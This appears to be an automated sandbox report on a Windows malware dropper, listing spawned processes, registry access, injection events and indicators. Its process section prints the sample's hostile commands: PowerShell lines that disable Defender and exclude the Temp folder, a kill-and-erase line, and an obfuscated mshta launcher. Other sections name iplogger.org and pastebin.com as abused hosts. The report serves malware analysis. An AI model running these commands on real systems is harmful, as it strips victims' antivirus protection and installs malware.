N/A N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 344 set thread context of 2780 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe

"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe

Sat0647140c100d63.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe

Sat06ebc37d1c94352.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe

Sat0663b341399ee.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe

Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe

Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe

Sat0619212f22dd7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe

Sat06f5ed0e3bb24.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe

Sat0618d93ac2c5c.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat060fd7e42d2.exe

Sat060fd7e42d2.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe" & exit

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

